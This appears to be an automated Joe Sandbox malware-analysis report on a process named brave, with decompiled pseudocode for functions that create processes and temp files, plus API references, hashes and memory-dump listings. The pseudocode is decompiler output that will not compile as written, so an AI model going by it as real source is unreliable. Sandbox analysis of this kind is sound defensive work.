Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: $0$@$\??\$basic_string::_M_construct null not valid
API String ID: 1844840824-2971582370
Opcode ID: ee05ecdc9710429fa0aab71fa4d1ecee077df793fd946b12f4536450c2e0f0d3
Instruction ID: d0029ef76efd477f9a675021fb7c38baae9e1b01c4a473cfad5a5a7c382b6a06
Opcode Fuzzy Hash: ee05ecdc9710429fa0aab71fa4d1ecee077df793fd946b12f4536450c2e0f0d3
Instruction Fuzzy Hash: DE515072608B8591E764DF15E8503AAB7A0FBC6788F984235EACC97B95DFBCD044CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B23CD0 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF652B23D01
wcslen.MSVCRT ref: 00007FF652B23D57

Part of subcall function 00007FF652B4DEF0: memcpy.MSVCRT ref: 00007FF652B4DF96
Part of subcall function 00007FF652B4DEF0: memcpy.MSVCRT ref: 00007FF652B4DFC1

wcslen.MSVCRT ref: 00007FF652B23DF7
memcpy.MSVCRT ref: 00007FF652B23F26

Strings

basic_string::_M_construct null not valid, xrefs: 00007FF652B23F40
\??\, xrefs: 00007FF652B23D50, 00007FF652B23D69
0, xrefs: 00007FF652B23EA0
@, xrefs: 00007FF652B23EAB

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpywcslen
String ID: 0$@$\??\$basic_string::_M_construct null not valid
API String ID: 982415701-2209788446
Opcode ID: 94939aa4065493588ff229156f05ba003bfbe37133c0b9f2618c22385aa06220
Instruction ID: eb89524bc6f7eec802a151cc4fc711ec7c7e5e5316ac2603fd3d7c3a93e10bd4
Opcode Fuzzy Hash: 94939aa4065493588ff229156f05ba003bfbe37133c0b9f2618c22385aa06220
Instruction Fuzzy Hash: EC612572618BC585E774CB15F8503AAB7A1FB85788F584225EACC97B99DFBCD008CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B228A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00007FF67FF652B228A0(void* __ecx, void* __edi, void* __esp, void* __rax, void* __rdx, long long __r8, long long __r9, intOrPtr _a4, long long _a12, long long _a20, long long _a28, long long _a36, long long _a44, long long _a60, long long _a64, long long _a68, long long _a76, long long _a84, char _a100, void* _a112, char _a224, char _a65824, long long _a65832) {
				long long _v4;
				long long _v12;
				void* _t32;
				void* _t33;
				intOrPtr* _t49;
				intOrPtr* _t50;

				E00007FF67FF652B2F680(0x10108);
				_a65824 = __r8;
				r8d = 0xfffe;
				_t33 = __ecx;
				_a65832 = __r9;
				memset(??, ??, ??);
				_a64 =  &_a65824;
				E00007FF67FF652B3A220(__ecx,  &_a224, __rdx, __rdx,  &_a65824);
				r9d = 0;
				memset(__edi, 0, 0xd << 0);
				_a36 =  &_a68;
				_a28 =  &_a100;
				_t49 =  *0x52dd6640; // 0x7ff652de1078
				_a44 =  &_a60;
				_a100 = 0x68;
				_a68 = 0;
				_a76 = 0;
				_a84 = 0;
				_a60 = 0;
				_a20 = 0;
				_a12 = 0;
				_a4 = 0x8000000;
				_v4 = 0;
				_v12 = 0;
				 *_t49(); // executed
				if (_t33 == 0) goto 0x52b229b7;
				_t50 =  *0x52dd6660; // 0x7ff652de1058
				_t32 =  *_t50();
				E00007FF67FF652B24D0D();
				return _t32;
			}

0x7ff652b228aa
0x7ff652b228bd
0x7ff652b228c7
0x7ff652b228cd
0x7ff652b228d2
0x7ff652b228da
0x7ff652b228fa
0x7ff652b228ff
0x7ff652b2290b
0x7ff652b2290e
0x7ff652b2291e
0x7ff652b2292b
0x7ff652b22930
0x7ff652b22937
0x7ff652b2293e
0x7ff652b22949
0x7ff652b22952
0x7ff652b2295b
0x7ff652b22967
0x7ff652b22970
0x7ff652b22979
0x7ff652b22982
0x7ff652b2298a
0x7ff652b22992
0x7ff652b2299b
0x7ff652b229a4
0x7ff652b229a6
0x7ff652b229b5
0x7ff652b229ba
0x7ff652b229cc

APIs

memset.MSVCRT ref: 00007FF652B228DA
CreateProcessInternalW.KERNELBASE ref: 00007FF652B2299B

Strings

h, xrefs: 00007FF652B2293E

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CreateInternalProcessmemset
String ID: h
API String ID: 101748716-2439710439
Opcode ID: b53532f66e41f7bf776b4946091af2562f442538e7f02a713487e15d1bab6a89
Instruction ID: efca1ba29b7fd8e8e3fe5a59d25d4d51f6fdad55c0291efd76ac989e45503060
Opcode Fuzzy Hash: b53532f66e41f7bf776b4946091af2562f442538e7f02a713487e15d1bab6a89
Instruction Fuzzy Hash: CF215732608B8092E7208B15F85479BB7A5F7C5788F544239EACC97BA8CFBDD149CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B34030 Relevance: 3.7, APIs: 2, Instructions: 652
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00007FF67FF652B34030(signed int* __rcx, long long __rdx, void* __r8) {
				intOrPtr _t96;
				signed int _t104;
				signed int _t110;
				signed int _t111;
				long long _t134;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t195;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t199;
				intOrPtr _t200;
				intOrPtr _t201;
				intOrPtr _t203;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t208;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t230;
				signed int* _t250;
				intOrPtr* _t251;
				long long _t252;
				long long _t259;
				signed int _t263;

				_t250 = __rcx;
				_t252 = __rdx;
				if (__rcx == 0) goto 0x52b345f0;
				_t251 =  *0x52dd6920; // 0x7ff652de1400
				_t184 =  *_t251;
				if (_t184 == 0) goto 0x52b342f8;
				if ( *((long long*)(_t184 + 0x38)) != 0) goto 0x52b34318;
				 *((long long*)(_t184 + 0x38)) = 0x52dd2bd0;
				E00007FF67FF652B384D0(0x52dd2bd0);
				_t185 =  *_t251;
				if (_t185 == 0) goto 0x52b3432d;
				if ( *((long long*)(_t185 + 0x48)) == 0) goto 0x52b34458;
				_t96 =  *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x48))));
				goto 0x52b340e5;
				_t228 =  *((intOrPtr*)( *_t251 + 0x40));
				_t187 =  *_t251;
				if (_t96 -  *_t228 >= 0) goto 0x52b34100;
				if ( *((long long*)(_t187 + 0x10)) == 0) goto 0x52b34358;
				if ( *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x10)))) + _t228 * 8)) == 0) goto 0x52b34470;
				if (_t187 == 0) goto 0x52b34370;
				if ( *((long long*)(_t187 + 0x40)) != 0) goto 0x52b340b0;
				 *((long long*)(_t187 + 0x40)) = 0x52de13c4;
				if (_t96 + 1 -  *0x52de13c4 < 0) goto 0x52b340bb;
				goto 0x52b3414d;
				asm("o16 nop [eax+eax]");
				_t230 =  *((intOrPtr*)(_t187 + 0x48));
				_t188 =  *_t251;
				if (0 -  *_t230 >= 0) goto 0x52b34168;
				if ( *((long long*)(_t188 + 0x10)) == 0) goto 0x52b343d8;
				_t263 = _t230 * 8;
				if ( *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x10)))) + _t230 * 8)) == 0) goto 0x52b344d0;
				if (_t188 == 0) goto 0x52b343f0;
				if ( *((long long*)(_t188 + 0x48)) != 0) goto 0x52b34118;
				 *((long long*)(_t188 + 0x48)) = 0x52de13c0;
				if (1 -  *0x52de13c0 < 0) goto 0x52b34123;
				if (_t188 == 0) goto 0x52b34765;
				if ( *((long long*)(_t188 + 0x40)) == 0) goto 0x52b345b0;
				_t189 =  *_t251;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x40)))) == 0x100000) goto 0x52b345cb;
				if (_t189 == 0) goto 0x52b347ee;
				_t134 =  *((long long*)(_t189 + 0x40));
				if (_t134 == 0) goto 0x52b34608;
				_t190 =  *_t251;
				if (_t134 != 0) goto 0x52b341cb;
				if ( *((long long*)(_t190 + 0x40)) != 0) goto 0x52b347e5;
				 *((long long*)(_t190 + 0x40)) = 0x52de13c4;
				_t104 =  >  ? 0x100000 :  *0x52de13c4 + 1;
				if (_t190 == 0) goto 0x52b34997;
				if ( *((long long*)(_t190 + 0x10)) == 0) goto 0x52b346d0;
				realloc(??, ??);
				_t259 =  *((intOrPtr*)(_t190 + 0x10));
				_t192 =  *_t251;
				if (_t259 == 0) goto 0x52b34b52;
				if (_t192 == 0) goto 0x52b349d5;
				if ( *((long long*)(_t192 + 0x40)) == 0) goto 0x52b346b8;
				_t193 =  *_t251;
				r8d = _t104;
				r8d = r8d -  *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x40))));
				if ( *(_t193 + 0x40) == 0) goto 0x52b346a0;
				memset(??, ??, ??);
				_t195 =  *_t251;
				if (_t195 == 0) goto 0x52b34971;
				if ( *((long long*)(_t195 + 0x10)) == 0) goto 0x52b34680;
				_t196 =  *_t251;
				 *((long long*)( *((intOrPtr*)(_t195 + 0x10)))) = _t259;
				if (_t196 == 0) goto 0x52b34852;
				if ( *((long long*)(_t196 + 0x40)) == 0) goto 0x52b34670;
				_t197 =  *_t251;
				r12d =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x40))));
				if ( *((long long*)(_t197 + 0x48)) == 0) goto 0x52b34660;
				r12d = r12d + 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x48)))) = r12d;
				if ( *(_t197 + 0x40) == 0) goto 0x52b34650;
				_t110 =  *( *(_t197 + 0x40));
				 *__rcx = _t110;
				if ( *(_t197 + 0x40) == 0) goto 0x52b34640;
				 *( *(_t197 + 0x40)) = _t104;
				if (__rdx == 0) goto 0x52b3473d;
				if ( *((long long*)(_t197 + 0x10)) == 0) goto 0x52b34708;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x10)))) + (_t259 +  *(_t193 + 0x40) * 8) * 8)) = __rdx;
				goto 0x52b344f6;
				E00007FF67FF652B37060(); // executed
				if ( *((long long*)(_t197 + 0x38)) == 0) goto 0x52b3406b;
				if ( *_t251 != 0) goto 0x52b34318;
				E00007FF67FF652B37060();
				E00007FF67FF652B384D0( *((intOrPtr*)( *_t251 + 0x38)));
				_t199 =  *_t251;
				if (_t199 != 0) goto 0x52b34087;
				E00007FF67FF652B37060();
				_t200 =  *_t251;
				if ( *((long long*)(_t199 + 0x48)) == 0) goto 0x52b34458;
				if (_t200 != 0) goto 0x52b34092;
				E00007FF67FF652B37060();
				goto 0x52b34092;
				 *((long long*)(_t200 + 0x10)) = _t259;
				goto 0x52b340ca;
				E00007FF67FF652B37060();
				_t201 =  *_t251;
				if ( *((long long*)(_t200 + 0x40)) == 0) goto 0x52b340f5;
				if (_t201 != 0) goto 0x52b340b0;
				E00007FF67FF652B37060();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t201 + 0x40)))) - _t104 <= 0) goto 0x52b34b5d;
				_t203 =  *_t251;
				if (_t203 != 0) goto 0x52b340bb;
				E00007FF67FF652B37060();
				if ( *((long long*)(_t203 + 0x10)) == 0) goto 0x52b34358;
				if ( *_t251 != 0) goto 0x52b340c6;
				E00007FF67FF652B37060();
				_t205 =  *_t251;
				goto 0x52b340ca;
				 *((long long*)(_t205 + 0x10)) = _t259;
				goto 0x52b34132;
				E00007FF67FF652B37060();
				_t206 =  *_t251;
				if ( *((long long*)(_t205 + 0x48)) == 0) goto 0x52b3415d;
				if (_t206 != 0) goto 0x52b34118;
				E00007FF67FF652B37060();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t206 + 0x48)))) - _t104 <= 0) goto 0x52b34b65;
				_t208 =  *_t251;
				if (_t208 != 0) goto 0x52b34123;
				E00007FF67FF652B37060();
				if ( *((long long*)(_t208 + 0x10)) == 0) goto 0x52b343d8;
				if ( *_t251 != 0) goto 0x52b3412e;
				E00007FF67FF652B37060();
				_t210 =  *_t251;
				goto 0x52b34132;
				 *((long long*)(_t210 + 0x48)) = 0x52de13c0;
				goto 0x52b34099;
				 *_t250 = _t104;
				if (_t252 == 0) goto 0x52b34570;
				if (_t210 == 0) goto 0x52b34728;
				_t111 = _t110 & 0xffffff00 |  *((long long*)(_t210 + 0x10)) != 0x00000000;
				if (_t111 == 0) goto 0x52b3455c;
				if (_t210 == 0) goto 0x52b347cb;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x10)))) + _t263)) = _t252;
				if (_t210 == 0) goto 0x52b346f3;
				if ((_t111 & 0xffffff00 |  *((long long*)(_t210 + 0x38)) != 0x00000000) == 0) goto 0x52b3454f;
				if (_t210 != 0) goto 0x52b34502;
				E00007FF67FF652B37060();
				goto 0x52b34502;
				 *_t250 = _t104;
				if (_t252 == 0) goto 0x52b3451c;
				if (_t210 == 0) goto 0x52b34a4e;
				if ( *((long long*)(_t210 + 0x10)) == 0) goto 0x52b346e3;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x10)))) + _t263)) = _t252;
				if (_t210 == 0) goto 0x52b34539;
				if ( *((long long*)(_t210 + 0x38)) == 0) goto 0x52b3454f;
				E00007FF67FF652B38410( *((intOrPtr*)(_t210 + 0x38)));
				return 0;
			}

0x7ff652b3403e
0x7ff652b34041
0x7ff652b34047
0x7ff652b3404d
0x7ff652b34054
0x7ff652b3405a
0x7ff652b34065
0x7ff652b34072
0x7ff652b34076
0x7ff652b3407b
0x7ff652b34081
0x7ff652b3408c
0x7ff652b34099
0x7ff652b340a9
0x7ff652b340b0
0x7ff652b340b4
0x7ff652b340b9
0x7ff652b340c0
0x7ff652b340dc
0x7ff652b340e8
0x7ff652b340f3
0x7ff652b340f8
0x7ff652b340fe
0x7ff652b34110
0x7ff652b34112
0x7ff652b34118
0x7ff652b3411c
0x7ff652b34121
0x7ff652b34128
0x7ff652b34137
0x7ff652b34144
0x7ff652b34150
0x7ff652b3415b
0x7ff652b34160
0x7ff652b34166
0x7ff652b3416b
0x7ff652b34176
0x7ff652b34180
0x7ff652b34189
0x7ff652b34192
0x7ff652b34198
0x7ff652b3419d
0x7ff652b341a7
0x7ff652b341ae
0x7ff652b341b5
0x7ff652b341c2
0x7ff652b341d6
0x7ff652b341e3
0x7ff652b341ee
0x7ff652b341fb
0x7ff652b34200
0x7ff652b34203
0x7ff652b34209
0x7ff652b34212
0x7ff652b3421d
0x7ff652b34227
0x7ff652b3422e
0x7ff652b34231
0x7ff652b3423b
0x7ff652b3424d
0x7ff652b34252
0x7ff652b34258
0x7ff652b34263
0x7ff652b3426d
0x7ff652b34270
0x7ff652b34276
0x7ff652b34281
0x7ff652b3428b
0x7ff652b3428e
0x7ff652b34296
0x7ff652b342a0
0x7ff652b342a4
0x7ff652b342ac
0x7ff652b342b6
0x7ff652b342b8
0x7ff652b342bf
0x7ff652b342c9
0x7ff652b342ce
0x7ff652b342d9
0x7ff652b342e8
0x7ff652b342ec
0x7ff652b342f8
0x7ff652b34305
0x7ff652b3430e
0x7ff652b34310
0x7ff652b3431c
0x7ff652b34321
0x7ff652b34327
0x7ff652b3432d
0x7ff652b34337
0x7ff652b3433a
0x7ff652b34343
0x7ff652b34349
0x7ff652b3434e
0x7ff652b34358
0x7ff652b34363
0x7ff652b34370
0x7ff652b3437a
0x7ff652b3437d
0x7ff652b34386
0x7ff652b3438c
0x7ff652b34397
0x7ff652b3439d
0x7ff652b343a3
0x7ff652b343a9
0x7ff652b343b9
0x7ff652b343be
0x7ff652b343c4
0x7ff652b343cd
0x7ff652b343d0
0x7ff652b343d8
0x7ff652b343e3
0x7ff652b343f0
0x7ff652b343fa
0x7ff652b343fd
0x7ff652b34406
0x7ff652b3440c
0x7ff652b34417
0x7ff652b3441d
0x7ff652b34423
0x7ff652b34429
0x7ff652b34439
0x7ff652b3443e
0x7ff652b34444
0x7ff652b3444d
0x7ff652b34450
0x7ff652b3445f
0x7ff652b34463
0x7ff652b34470
0x7ff652b34475
0x7ff652b3447e
0x7ff652b34489
0x7ff652b3448e
0x7ff652b34497
0x7ff652b344a4
0x7ff652b344ab
0x7ff652b344bb
0x7ff652b344c4
0x7ff652b344c6
0x7ff652b344cb
0x7ff652b344d0
0x7ff652b344d5
0x7ff652b344da
0x7ff652b344e5
0x7ff652b344f2
0x7ff652b344f9
0x7ff652b34500
0x7ff652b34506
0x7ff652b3451b

APIs

realloc.MSVCRT ref: 00007FF652B341FB

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: e336d157d8cadeff1a172b5fc071843bb7c4cd571cbffa88969bb0cc07652b88
Instruction ID: bb3d05c0f98d7614d393dd7c501f93029cc2db5e3184005bb8b019d0be0ad461
Opcode Fuzzy Hash: e336d157d8cadeff1a172b5fc071843bb7c4cd571cbffa88969bb0cc07652b88
Instruction Fuzzy Hash: EC622B76A09B0682EA649F09D85037D67B0FB66B8CF0D4575CA5CA7391DFBDE880C312

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B33F00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FF67FF652B33F00(void* __rax, intOrPtr* __rcx, void* __rdx) {
				intOrPtr _t8;
				void* _t14;

				_t14 = __rax;
				if (__rdx == 0) goto 0x52b34018;
				if ( *__rcx == 1) goto 0x52b33f68;
				E00007FF67FF652B30F00(__rcx);
				_t1 = _t14 + 8; // 0x8
				E00007FF67FF652B304E0(_t1);
				_t8 =  *__rcx;
				if (_t8 == 0) goto 0x52b33f80;
				if (_t8 != 1) goto 0x52b33ff0;
				E00007FF67FF652B30800(_t1);
				E00007FF67FF652B31110(_t14);
				return 0;
			}

0x7ff652b33f00
0x7ff652b33f16
0x7ff652b33f1f
0x7ff652b33f21
0x7ff652b33f26
0x7ff652b33f30
0x7ff652b33f35
0x7ff652b33f39
0x7ff652b33f3e
0x7ff652b33f47
0x7ff652b33f4f
0x7ff652b33f61

APIs

Part of subcall function 00007FF652B30F00: calloc.MSVCRT(?,?,00007FFA26C83CA0,00007FF652B33F26,?,?,?,?,000001AC127317F0,00007FFA26C83CA0,?,00007FF652B3029B,000001AC127317F0,00000000,00007FFA26C83CA0,00007FF652B232FA), ref: 00007FF652B310A4

fprintf.MSVCRT ref: 00007FF652B3400B

Strings

once %p is %d, xrefs: 00007FF652B34001

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: callocfprintf
String ID: once %p is %d
API String ID: 3366074580-95064319
Opcode ID: 6e9b06d7a7e3d48af93b056f8de7be245cf1a8abe53ffd6387711d9ba53eb8ef
Instruction ID: 8b056dbe0b18de6615118dbabac3e036df10872b59b1acdd4cf9520c369005b3
Opcode Fuzzy Hash: 6e9b06d7a7e3d48af93b056f8de7be245cf1a8abe53ffd6387711d9ba53eb8ef
Instruction Fuzzy Hash: 3E31C572B19B0282FE559B19FC412BA62A4BF9679CF4C4136DE5C97395EEBCE481C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B227F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00007FF67FF652B227F0(void* __edi, void* __esp, long long __rcx, void* __rdx, long long __r8) {
				void* _v136;
				long long _v144;
				char _v148;
				char _v156;
				long long _v172;
				long long _v180;
				long long _v188;
				long long _v196;
				long long _v204;
				intOrPtr _v212;
				long long _v220;
				long long _v228;
				void* _t19;
				intOrPtr* _t30;

				_v144 = 0;
				memset(__edi, 0, 0xd << 0);
				_v196 = __r8;
				_v172 =  &_v156;
				_v188 =  &_v148;
				_t30 =  *0x52dd6640; // 0x7ff652de1078
				_v212 = r9d;
				r9d = 0;
				_v148 = 0x68;
				 *((long long*)(__rcx)) = 0;
				 *((long long*)(__rcx + 8)) = 0;
				 *((long long*)(__rcx + 0x10)) = 0;
				_v180 = __rcx;
				_v204 = 0;
				_v220 = 0;
				_v228 = 0;
				_t19 =  *_t30(); // executed
				return _t19;
			}

0x7ff652b22809
0x7ff652b22812
0x7ff652b2281a
0x7ff652b22822
0x7ff652b2282e
0x7ff652b22833
0x7ff652b2283a
0x7ff652b2283f
0x7ff652b22842
0x7ff652b2284a
0x7ff652b22852
0x7ff652b2285b
0x7ff652b22864
0x7ff652b22869
0x7ff652b22872
0x7ff652b2287a
0x7ff652b22883
0x7ff652b22892

APIs

CreateProcessInternalW.KERNELBASE ref: 00007FF652B22883

Strings

h, xrefs: 00007FF652B22842

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CreateInternalProcess
String ID: h
API String ID: 2186235152-2439710439
Opcode ID: 8bba045a17cefcb5b05322b069f8357d251dc813df342985f80b1a2e19d1b3c7
Instruction ID: fd14809a9f15113436f961da7896cd9f95ac7ef06f38adcd1d3d6b3474d87c0b
Opcode Fuzzy Hash: 8bba045a17cefcb5b05322b069f8357d251dc813df342985f80b1a2e19d1b3c7
Instruction Fuzzy Hash: A601E832618B8082E7508F54F45874BB7A4F784788FA08229EBC807B68DFBDD158CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B24880 Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00007FF67FF652B24880(void* __edi, void* __esp, void* __rax, void* __rcx, void* __rdx, void* __r9) {
				void* _v596;
				void* _v608;
				char _v1112;
				void* _t13;
				void* _t27;
				void* _t40;

				_t27 = __rax;
				r12d = r8d;
				memset(__edi + 0x41, memset(__edi, 0, 0x41 << 0), 0x41 << 0);
				GetTempPathW(??, ??);
				r8d = 0;
				GetTempFileNameW(??, ??, ??, ??); // executed
				r8d = r12d;
				_t13 = E00007FF67FF652B24530(__rax,  &_v1112, __rdx, _t40); // executed
				if (_t27 - 1 - 0xfffffffd <= 0) goto 0x52b24928;
				return _t13;
			}

0x7ff652b24880
0x7ff652b2489b
0x7ff652b248c4
0x7ff652b248d7
0x7ff652b248e0
0x7ff652b248e8
0x7ff652b248ee
0x7ff652b248f7
0x7ff652b24907
0x7ff652b24921

APIs

GetTempPathW.KERNEL32 ref: 00007FF652B248D7
GetTempFileNameW.KERNEL32 ref: 00007FF652B248E8

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
